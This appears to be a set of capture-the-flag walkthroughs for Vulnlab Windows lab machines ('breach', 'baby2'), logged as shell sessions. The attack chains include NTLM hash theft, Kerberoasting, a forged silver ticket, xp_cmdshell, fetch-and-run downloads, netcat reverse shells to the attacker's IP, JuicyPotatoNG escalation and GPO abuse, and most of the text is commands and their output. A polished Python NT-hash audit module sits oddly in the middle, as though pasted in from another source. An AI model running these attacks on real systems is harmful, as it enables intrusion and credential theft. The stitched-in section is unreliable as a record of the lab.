BRUNODC$:1000:aad3b435b51404eeaad3b435b51404ee:b8e4490980c8dd1be0d35703bf4bf393:::
[*] Kerberos keys grabbed
[*] Cleaning up... 
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/bruno]

Beyond root

*Evil-WinRM* PS C:\windows\system32\tasks> hostname
brunodc
*Evil-WinRM* PS C:\windows\system32\tasks>  Get-MpComputerStatus


AMEngineVersion                  : 0.0.0.0
AMProductVersion                 : 4.18.2203.5
AMRunningMode                    : Not running
AMServiceEnabled                 : False
AMServiceVersion                 : 0.0.0.0
AntispywareEnabled               : False
AntispywareSignatureAge          : 4294967295
AntispywareSignatureLastUpdated  :
AntispywareSignatureVersion      : 0.0.0.0
AntivirusEnabled                 : False
AntivirusSignatureAge            : 4294967295
--snip--



*Evil-WinRM* PS C:\windows\system32\tasks> type scanner
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2022-06-29T13:50:49.3977635</Date>
    <Author>BRUNO\administrator</Author>
    <URI>\scanner</URI>
  </RegistrationInfo>
  <Triggers>
    <BootTrigger>
      <Repetition>
        <Interval>PT1M</Interval>
        <StopAtDurationEnd>false</StopAtDurationEnd>
      </Repetition>
      <Enabled>true</Enabled>
      <Delay>PT1M</Delay>
    </BootTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <RunLevel>LeastPrivilege</RunLevel>
      <UserId>svc_scan</UserId>
      <LogonType>Password</LogonType>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
    <AllowHardTerminate>true</AllowHardTerminate>
    <StartWhenAvailable>true</StartWhenAvailable>
    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
    <IdleSettings>
      <StopOnIdleEnd>true</StopOnIdleEnd>
      <RestartOnIdle>false</RestartOnIdle>
    </IdleSettings>
    <AllowStartOnDemand>true</AllowStartOnDemand>
    <Enabled>true</Enabled>
    <Hidden>false</Hidden>
    <RunOnlyIfIdle>false</RunOnlyIfIdle>
    <WakeToRun>false</WakeToRun>
    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
    <Priority>7</Priority>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\samples\app\SampleScanner.exe</Command>
    </Exec>
  </Actions>
</Task>
*Evil-WinRM* PS C:\windows\system32\tasks> 


vulnlab-breach

vulnlab breach

a Medium Windows machine

tools used : ntlm_theft.py , impacket-getPac , impacket-GetUserSPNs , ldapdomaindump , impacket-mssqlclient , JuicyPotatoNG.exe


We create a bunch of files which will lead to an NTLMv2 hash stealing attack, using this tool: https://github.com/Greenwolf/ntlm_theft

python ntlm_theft.py -g all -s 10.10.97.69 -f puckie


┌──(puck㉿kali)-[~/vulnlab/breach]
sudo responder -I tun0

                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.4.0

  To support this project:
  Github -> https://github.com/sponsors/lgandx


[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.8.2.138]
    Responder IPv6             [fe80::e718:d192:5032:1452]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']

[+] Current Session Variables:
    Responder Machine Name     [WIN-88BT76XF41N]
    Responder Domain Name      [FBHG.LOCAL]
    Responder DCE-RPC Port     [49865]

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.10.97.69
[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong
[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:1fa52157fd1fca3b --snip--
[*] Skipping previously captured hash for BREACH\Julia.Wong


The hash identifier for NetNTLMv2 hashes is 5600. You can find this within the hashcat example hashes page.

hashcat -a 0 -m 5600 julia_wong.txt /usr/share/wordlists/rockyou.txt


as Julia.Wong

┌──(puck㉿kali)-[~/vulnlab/breach]
impacket-getPac -targetUser administrator breach.vl/julia.wong:Computer1       
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

KERB_VALIDATION_INFO 
LogonTime:                      
    dwLowDateTime:                   2560514102 
    dwHighDateTime:                  30942228 
LogoffTime:                     
--snip--

Domain SID: S-1-5-21-2330692793-3312915120-706255856

 0000   10 00 00 00 F5 18 12 7A  3C 36 13 6A 18 C4 BD 3F   .......z<6.j...?


┌──(puck㉿kali)-[~/vulnlab/breach]
impacket-GetUserSPNs breach.vl/julia.wong:Computer1 -dc-ip 10.10.97.69 -request 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

ServicePrincipalName              Name       MemberOf  PasswordLastSet             LastLogon                   Delegation 
--------------------------------  ---------  --------  --------------------------  --------------------------  ----------
MSSQLSvc/breachdc.breach.vl:1433  svc_mssql            2022-02-17 05:43:08.106169  2024-06-07 05:23:44.260778             



$krb5tgs$23$*svc_mssql$BREACH.VL$breach.vl/svc_mssql*$a497b878287c08cf634ef3530131743b$--snip--
                                                                                                                     

Getting more users

┌──(puck㉿kali)-[~/vulnlab/breach]
ldapdomaindump breach.vl -u 'breach\Julia.Wong' -p 'Computer1'
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
                                                                                                                     
cat domain_users.grep | grep svc 
svc_mssql svc_mssql svc_mssql Domain Users 02/17/22 10:43:07 06/07/24 13:34:45 06/07/24 13:34:45 NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD 02/17/22 10:43:08 S-1-5-21-2330692793-3312915120-706255856-1115

bloodhound-python -d breach.vl -u 'Julia.Wong' -p 'Computer1' -c all -ns 10.10.97.69 

Create a silver ticket with the NTLM hash of the svc_mssql user:

In order to perform a silver ticket attack we require the domain SID, the NTLM hash of the service account and the SPN of the service account

┌──(puck㉿kali)-[~/vulnlab/breach]
iconv -f ASCII -t UTF-16LE <(printf "Trustno1") | openssl dgst -md4 
MD4(stdin)= 69596c7aa1e8daee17f8e78870e25a5c
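The openssl one-liner above is the whole NT hash derivation: MD4 over the UTF-16LE bytes of the password, with no salt and no iteration, which is why a DCSync dump shows identical hashes for every account sharing a password and why a leaked hash is as usable as the password itself. The following is an added example (not code from the writeup) that reimplements MD4 per RFC 1320 so the derivation can be checked offline and adds a small audit that flags shared and blank NT hashes in secretsdump-format lines; the function names and the sample dump lines are assumptions, while the Trustno1 hash and the empty-password hash 31d6cfe0... are the page's own values.

```python
"""NT hash = MD4(UTF-16LE(password)) with no salt.

Added illustration, not code from the writeup. MD4 is implemented here per
RFC 1320 because OpenSSL 3 builds commonly leave it out of hashlib. Function
names are assumed; the sample dump lines at the bottom are constructed.
"""
import struct

MASK32 = 0xFFFFFFFF
LM_EMPTY = "aad3b435b51404eeaad3b435b51404ee"  # LM field when LM hashing is off

# Message-word order for rounds 2 and 3 (RFC 1320 section 3.4).
_R2_K = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]
_R3_K = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]


def _rotl(x: int, n: int) -> int:
    """32-bit left rotation."""
    return ((x << n) | (x >> (32 - n))) & MASK32


def _f(x, y, z):
    return (x & y) | (~x & MASK32 & z)      # round 1 selection function


def _g(x, y, z):
    return (x & y) | (x & z) | (y & z)      # round 2 majority function


def _h(x, y, z):
    return x ^ y ^ z                        # round 3 parity function


def md4(data: bytes) -> bytes:
    """MD4 digest of data (RFC 1320)."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    # Padding: 0x80, zeros to 56 mod 64, then the 64-bit little-endian bit length.
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        # Each step updates one register and rotates (A,B,C,D) -> (D,A,B,C),
        # which reproduces the ABCD/DABC/CDAB/BCDA step sequence of the RFC.
        for i in range(16):
            a = _rotl((a + _f(b, c, d) + x[i]) & MASK32, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):
            a = _rotl((a + _g(b, c, d) + x[_R2_K[i]] + 0x5A827999) & MASK32,
                      (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):
            a = _rotl((a + _h(b, c, d) + x[_R3_K[i]] + 0x6ED9EBA1) & MASK32,
                      (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = ((a + aa) & MASK32, (b + bb) & MASK32,
                      (c + cc) & MASK32, (d + dd) & MASK32)
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> str:
    """Lower-case hex NT hash: MD4 over the UTF-16LE bytes, no salt, no iteration."""
    return md4(password.encode("utf-16-le")).hex()


def parse_pwdump(lines):
    """Yield (account, nthash) from secretsdump-style user:rid:lm:nt::: lines."""
    for line in lines:
        parts = line.strip().split(":")
        if len(parts) >= 4 and len(parts[3]) == 32:
            yield parts[0], parts[3].lower()


def find_shared_hashes(lines):
    """Accounts grouped by NT hash, keeping only hashes used by more than one
    account: with no salt, identical hashes mean identical passwords."""
    by_hash = {}
    for account, nthash in parse_pwdump(lines):
        by_hash.setdefault(nthash, []).append(account)
    return {h: accts for h, accts in by_hash.items() if len(accts) > 1}


def find_empty_passwords(lines):
    """Accounts whose NT hash is MD4 of the empty string (blank password)."""
    return [acct for acct, nthash in parse_pwdump(lines) if nthash == nt_hash("")]


# Constructed sample in secretsdump output format (not the lab's real dump).
SAMPLE_DUMP = [
    f"Guest:501:{LM_EMPTY}:{nt_hash('')}:::",
    f"lab.vl\\svc_a:1103:{LM_EMPTY}:{nt_hash('Trustno1')}:::",
    f"lab.vl\\svc_b:1104:{LM_EMPTY}:{nt_hash('Trustno1')}:::",
    f"lab.vl\\alice:1105:{LM_EMPTY}:{nt_hash('Winter2024!')}:::",
]
```

Running `find_shared_hashes` over a real DCSync dump is a quick way to spot service accounts that share a password, which is exactly the condition that turns one leaked hash into several compromised principals.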


impacket-ticketer -nthash 69596c7aa1e8daee17f8e78870e25a5c -domain-sid S-1-5-21-2330692793-3312915120-706255856 -domain breach.vl -dc-ip breachdc -spn MSSQLSvc/breachdc.breach.vl:1433 administrator
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for breach.vl/administrator
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Saving ticket in administrator.ccache
                                                                                                                     
export KRB5CCNAME=administrator.ccache


┌──(puck㉿kali)-[~/vulnlab/breach]
impacket-mssqlclient -k breachdc.breach.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (BREACH\Administrator  dbo@master)> 


SQL stuff

SQL (BREACH\Administrator  dbo@master)> sp_configure 'show advanced options', '1'
[*] INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (BREACH\Administrator  dbo@master)> RECONFIGURE
SQL (BREACH\Administrator  dbo@master)> sp_configure 'xp_cmdshell', '1'
[*] INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (BREACH\Administrator  dbo@master)> RECONFIGURE
SQL (BREACH\Administrator  dbo@master)> xp_cmdshell dir "C:\"
output                                                       
----------------------------------------------------------   
 Volume in drive C has no label.                             

 Volume Serial Number is B465-02B6                           

NULL                                                         

 Directory of C:\                                            

NULL                                                         

08/19/2021  06:24 AM    <DIR>          EFI                   

02/17/2022  09:55 AM    <DIR>          inetpub               

05/08/2021  08:20 AM    <DIR>          PerfLogs              

02/17/2022  10:28 AM    <DIR>          Program Files         

02/17/2022  10:27 AM    <DIR>          Program Files (x86)   

02/17/2022  02:11 PM    <DIR>          share                 

02/17/2022  01:12 PM    <DIR>          Users                 

02/17/2022  03:35 PM    <DIR>          Windows               

               0 File(s)              0 bytes                

               8 Dir(s)  11,722,678,272 bytes free           

NULL                                                       

                         

SQL (BREACH\Administrator  dbo@master)> xp_cmdshell powershell -c "wget -usebasicparsing http://10.8.2.138:8000/nc64.exe -o C:\Temp\nc64.exe"
output   
------   
NULL     

SQL (BREACH\Administrator  dbo@master)> xp_cmdshell dir "C:\Temp"
output                                               
--------------------------------------------------   
 Volume in drive C has no label.                     

 Volume Serial Number is B465-02B6                   

NULL                                                 

 Directory of C:\Temp                                

NULL                                                 

06/07/2024  10:34 AM    <DIR>          .             

06/07/2024  10:34 AM            45,272 nc64.exe      

               1 File(s)         45,272 bytes        

               1 Dir(s)  11,754,811,392 bytes free   

NULL                                                 

SQL (BREACH\Administrator  dbo@master)> xp_cmdshell powershell -c "C:\Temp\nc64.exe -e cmd 10.8.2.138 4444"


Privesc with JuicyPotatoNG

┌──(puck㉿kali)-[~/vulnlab/breach]
└─$ nc -nlvp 4444 
listening on [any] 4444 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.97.69] 59869
Microsoft Windows [Version 10.0.20348.558]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
breach\svc_mssql

C:\Windows\system32>whoami /all
whoami /all

USER INFORMATION
----------------

User Name        SID                                          
================ =============================================
breach\svc_mssql S-1-5-21-2330692793-3312915120-706255856-1115


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                                             Attributes                                        
========================================== ================ =============================================================== ==================================================
Everyone                                   Well-known group S-1-1-0                                                         Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                                    Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                                    Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                       Well-known group S-1-5-6                                                         Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1                                                         Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                                        Mandatory group, Enabled by default, Enabled group
NT SERVICE\MSSQL$SQLEXPRESS                Well-known group S-1-5-80-3880006512-4290199581-1648723128-3569869737-3631323133 Enabled by default, Enabled group, Group owner    
LOCAL                                      Well-known group S-1-2-0                                                         Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                                     Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288                                                                                                      


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

C:\Windows\system32>cd c:\temp
cd c:\temp

c:\Temp>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Temp> wget -usebasicparsing http://10.8.2.138:8000/JuicyPotatoNG.exe -o JuicyPotatoNG.exe
wget -usebasicparsing http://10.8.2.138:8000/JuicyPotatoNG.exe -o JuicyPotatoNG.exe
PS C:\Temp> dir
dir

    Directory: C:\Temp

Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----          6/7/2024  11:08 AM         153600 JuicyPotatoNG.exe                                                    
-a----          6/7/2024  10:34 AM          45272 nc64.exe                                                             


PS C:\Temp> .\JuicyPotatoNG.exe -t * -p .\nc64.exe -l 443 -a "-e cmd 10.8.2.138 445"
.\JuicyPotatoNG.exe -t * -p .\nc64.exe -l 443 -a "-e cmd 10.8.2.138 445"
PS C:\Temp>


┌──(puck㉿kali)-[~/vulnlab/breach]
rlwrap nc -nlvp 445
listening on [any] 445 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.97.69] 64454
Microsoft Windows [Version 10.0.20348.558]
(c) Microsoft Corporation. All rights reserved.

C:\>whoami
whoami
nt authority\system

c:\Users\Administrator\Desktop>hostname
hostname
BREACHDC


vulnlab – baby2

Baby2 is a medium Windows machine on Vulnlab

https://wiki.vulnlab.com/intro/lab-access

Tools used : kerbrute_linux , crackmapexec , responder , smbclient , bloodhound-python , pygpoabuse.py , evil-winrm , impacket-secretsdump

After the nmap scan, we add to our /etc/hosts

10.10.107.115 dc.baby2.vl baby2.vl

SMB enumeration

┌──(puck㉿kali)-[~/vulnlab/baby2]
└─$ ./kerbrute_linux_386 userenum -d baby2.vl --dc 10.10.107.115 ./users.txt -v

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 06/05/24 - Ronnie Flathers @ropnop

2024/06/05 10:51:32 >  Using KDC(s):
2024/06/05 10:51:32 >  	10.10.107.115:88

2024/06/05 10:51:32 >  [+] VALID USERNAME:	 Joan.Jennings@baby2.vl
2024/06/05 10:51:32 >  [!] library        @baby2.vl - User does not exist
2024/06/05 10:51:32 >  [+] VALID USERNAME:	 Mohammed.Harris@baby2.vl
2024/06/05 10:51:32 >  [+] VALID USERNAME:	 Kieran.Mitchell@baby2.vl
2024/06/05 10:51:32 >  [+] VALID USERNAME:	 Harry.Shaw@baby2.vl
2024/06/05 10:51:32 >  [+] VALID USERNAME:	 Amelia.Griffiths@baby2.vl
2024/06/05 10:51:32 >  [+] VALID USERNAME:	 Carl.Moore@baby2.vl
2024/06/05 10:51:32 >  [!] Joel.Hurst   @baby2.vl - User does not exist
2024/06/05 10:51:32 >  [!] Nicola.Lamb    @baby2.vl - User does not exist
2024/06/05 10:51:32 >  [!] Lynda.Bailey   @baby2.vl - User does not exist
2024/06/05 10:51:33 >  [+] VALID USERNAME:	 Ryan.Jenkins@baby2.vl
2024/06/05 10:51:33 >  Done! Tested 11 usernames (7 valid) in 0.046 seconds


┌──(puck㉿kali)-[~/vulnlab/baby2]
└─$ crackmapexec smb baby2.vl -u 'users.txt' -p 'users.txt'  --no-bruteforce --continue-on-success
SMB         dc.baby2.vl     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False)
SMB         dc.baby2.vl     445    DC               [-] baby2.vl\Amelia.Griffiths:Amelia.Griffiths STATUS_LOGON_FAILURE 
SMB         dc.baby2.vl     445    DC               [+] baby2.vl\Carl.Moore:Carl.Moore 
SMB         dc.baby2.vl     445    DC               [-] baby2.vl\Harry.Shaw:Harry.Shaw STATUS_LOGON_FAILURE 
SMB         dc.baby2.vl     445    DC               [-] baby2.vl\Joan.Jennings:Joan.Jennings STATUS_LOGON_FAILURE 
SMB         dc.baby2.vl     445    DC               [-] baby2.vl\Joel.Hurst:Joel.Hurst STATUS_LOGON_FAILURE 
SMB         dc.baby2.vl     445    DC               [-] baby2.vl\Kieran.Mitchell:Kieran.Mitchell STATUS_LOGON_FAILURE 
SMB         dc.baby2.vl     445    DC               [+] baby2.vl\library:library 
SMB         dc.baby2.vl     445    DC               [-] baby2.vl\Lynda.Bailey:Lynda.Bailey STATUS_LOGON_FAILURE 
SMB         dc.baby2.vl     445    DC               [-] baby2.vl\Mohammed.Harris:Mohammed.Harris STATUS_LOGON_FAILURE 
SMB         dc.baby2.vl     445    DC               [-] baby2.vl\Nicola.Lamb:Nicola.Lamb STATUS_LOGON_FAILURE 
SMB         dc.baby2.vl     445    DC               [-] baby2.vl\Ryan.Jenkins:Ryan.Jenkins STATUS_LOGON_FAILURE 

┌──(puck㉿kali)-[~/vulnlab/baby2]
sudo responder -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.4.0

  To support this project:
  Github -> https://github.com/sponsors/lgandx
  Paypal  -> https://paypal.me/PythonResponder

--snip--

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.8.2.138]
    Responder IPv6             [fe80::649e:d175:8068:bcd1]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']

[+] Current Session Variables:
    Responder Machine Name     [WIN-4JOEGPTIY13]
    Responder Domain Name      [VHTD.LOCAL]
    Responder DCE-RPC Port     [45034]

[+] Listening for events...

[SMB] NTLMv1-SSP Client   : 10.10.107.115
[SMB] NTLMv1-SSP Username : BABY2\Amelia.Griffiths
[SMB] NTLMv1-SSP Hash     : Amelia.Griffiths::BABY2:209A2B76B00AD43400000000000000000000000000000000:3396018DE3FBCDC60DDC06D5C83119BA2C907D2EE4041103:fe87a8a485cea873
[*] Skipping previously captured hash for BABY2\Amelia.Griffiths
[*] Skipping previously captured hash for BABY2\Amelia.Griffiths
[*] Skipping previously captured hash for BABY2\Amelia.Griffiths


Download login.vbs, modify it, and then upload it back

┌──(puck㉿kali)-[~/vulnlab/baby2]
└─$ smbclient //baby2.vl/SYSVOL -U Carl.Moore
Password for [WORKGROUP\Carl.Moore]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Aug 22 19:37:36 2023
  ..                                  D        0  Tue Aug 22 19:37:36 2023
  baby2.vl                           Dr        0  Tue Aug 22 19:37:36 2023

        6126847 blocks of size 4096. 1960515 blocks available
smb: \> cd baby2.vl
smb: \baby2.vl\> ls
  .                                   D        0  Tue Aug 22 19:43:55 2023
  ..                                  D        0  Tue Aug 22 19:37:36 2023
  DfsrPrivate                      DHSr        0  Tue Aug 22 19:43:55 2023
  Policies                            D        0  Tue Aug 22 19:37:41 2023
  scripts                             D        0  Tue Aug 22 21:28:27 2023

        6126847 blocks of size 4096. 1960512 blocks available
smb: \baby2.vl\> cd scripts
smb: \baby2.vl\scripts\> ls
  .                                   D        0  Tue Aug 22 21:28:27 2023
  ..                                  D        0  Tue Aug 22 19:43:55 2023
  login.vbs                           A      992  Sat Sep  2 16:55:51 2023

        6126847 blocks of size 4096. 1960216 blocks available
smb: \baby2.vl\scripts\> get login.vbs
getting file \baby2.vl\scripts\login.vbs of size 992 as login.vbs (6.5 KiloBytes/sec) (average 6.5 KiloBytes/sec)
smb: \baby2.vl\scripts\> ls
  .                                   D        0  Tue Aug 22 21:28:27 2023
  ..                                  D        0  Tue Aug 22 19:43:55 2023
  login.vbs                           A      992  Sat Sep  2 16:55:51 2023

        6126847 blocks of size 4096. 1980334 blocks available
smb: \baby2.vl\scripts\> put login.vbs
putting file login.vbs as \baby2.vl\scripts\login.vbs (19.4 kb/s) (average 19.4 kb/s)
smb: \baby2.vl\scripts\> ls
  .                                   D        0  Tue Aug 22 21:28:27 2023
  ..                                  D        0  Tue Aug 22 19:43:55 2023
  login.vbs                           A     1190  Thu Jun  6 10:42:19 2024

        6126847 blocks of size 4096. 1980332 blocks available
smb: \baby2.vl\scripts\>

┌──(puck㉿kali)-[~/vulnlab/baby2]
└─$ bloodhound-python -d 'baby2.vl' -u 'library' -p 'library' -c all -ns 10.10.97.10 
INFO: Found AD domain: baby2.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.baby2.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.baby2.vl
INFO: Found 16 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.baby2.vl
INFO: Done in 00M 06S

Catch the shell

┌──(puck㉿kali)-[~/vulnlab/baby2]
└─$ python3 -m http.server 
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.121.13 - - [06/Jun/2024 10:42:58] "GET /Invoke-ConPtyShell.ps1 HTTP/1.1" 200 -
10.10.121.13 - - [06/Jun/2024 10:53:49] "GET /nc.exe HTTP/1.1" 200 -
10.10.121.13 - - [06/Jun/2024 10:53:49] "GET /nc.exe HTTP/1.1" 200 -
10.10.121.13 - - [06/Jun/2024 10:54:49] "GET /nc.exe HTTP/1.1" 200 -
10.10.121.13 - - [06/Jun/2024 10:54:49] "GET /nc.exe HTTP/1.1" 200 -

┌──(puck㉿kali)-[~/vulnlab/baby2]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.121.13] 54867
Microsoft Windows [Version 10.0.20348.1906]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
baby2\amelia.griffiths

C:\Windows\system32>cd c:\temp
cd c:\temp

c:\temp>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is E6F3-2485

 Directory of c:\temp

06/06/2024  01:53 AM    <DIR>          .
06/06/2024  01:53 AM            45,272 nc.exe
               1 File(s)         45,272 bytes
               1 Dir(s)   8,262,537,216 bytes free

c:\temp>powershell                                                     
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\temp> iex (iwr -usebasicparsing http://10.8.2.138:8000/PowerView.ps1)

PS C:\temp> add-domainobjectacl -rights "all" -targetidentity "gpoadm" -principalidentity "Amelia.Griffiths"

PS C:\temp> $cred = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

PS C:\temp> set-domainuserpassword gpoadm -accountpassword $cred

PS C:\temp> 

Check that the new password works:

┌──(puck㉿kali)-[~/vulnlab/baby2]
└─$ crackmapexec smb baby2.vl -u 'gpoadm' -p 'Password123!'  --no-bruteforce --continue-on-success 
SMB         dc.baby2.vl     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False)
SMB         dc.baby2.vl     445    DC               [+] baby2.vl\gpoadm:Password123! 

Using pyGPOAbuse, we can create an immediate scheduled task that runs as SYSTEM and adds gpoadm to the local Administrators group (for this I had to use a Python virtual environment, because some dependencies conflicted with the installed version of impacket). We need the GPO ID to create the task.

┌──(puck㉿kali)-[~/vulnhub/baby2]
└─$ git clone https://github.com/Hackndo/pyGPOAbuse.git
Cloning into 'pyGPOAbuse'
┌──(puck㉿kali)-[~/vulnhub/baby2/pyGPOAbuse]
└─$ python3 -m venv venv
┌──(puck㉿kali)-[~/vulnhub/baby2/pyGPOAbuse]
└─$ source venv/bin/activate
┌──(venv)─(puck㉿kali)-[~/vulnhub/baby2/pyGPOAbuse]
└─$ ls
assets LICENSE pygpoabuse pygpoabuse.py README.md requirements.txt venv
┌──(venv)─(puck㉿kali)-[~/vulnhub/baby2/pyGPOAbuse] 
└─$ pip3 install -r requirements.txt
Collecting msldap (from -r requirements.txt (line 1))
┌──(venv)─(puck㉿kali)-[~/vulnhub/baby2/pyGPOAbuse]
└─$ python3 pygpoabuse.py 'baby2.vl/gpoadm:Password123!' -gpo-id 31B2F340-016D-11D2-945F-00C04FB984F9 -f -dc-ip 10.10.71.85 -command 'net localgroup administrators /add gpoadm' 
SUCCESS:root:ScheduledTask TASK_60bdad92 created!
[+] ScheduledTask TASK_60bdad92 created!

Now gpoadm is a member of the local Administrators group:

PS C:\temp> net user gpoadm
net user gpoadm
User name gpoadm
Full Name gpoadm
Comment 
User's comment 
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 6/6/2024 7:16:03 AM
Password expires Never
Password changeable 6/7/2024 7:16:03 AM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script 
User profile 
Home directory 
Last logon Never

Logon hours allowed All

Local Group Memberships *Administrators 
Global Group memberships *Domain Users 
The command completed successfully.

PS C:\temp>


┌──(puck㉿kali)-[~/vulnhub/baby2]
└─$ evil-winrm -i baby2.vl -u 'gpoadm' -p 'Password123!' 

Evil-WinRM shell v3.5

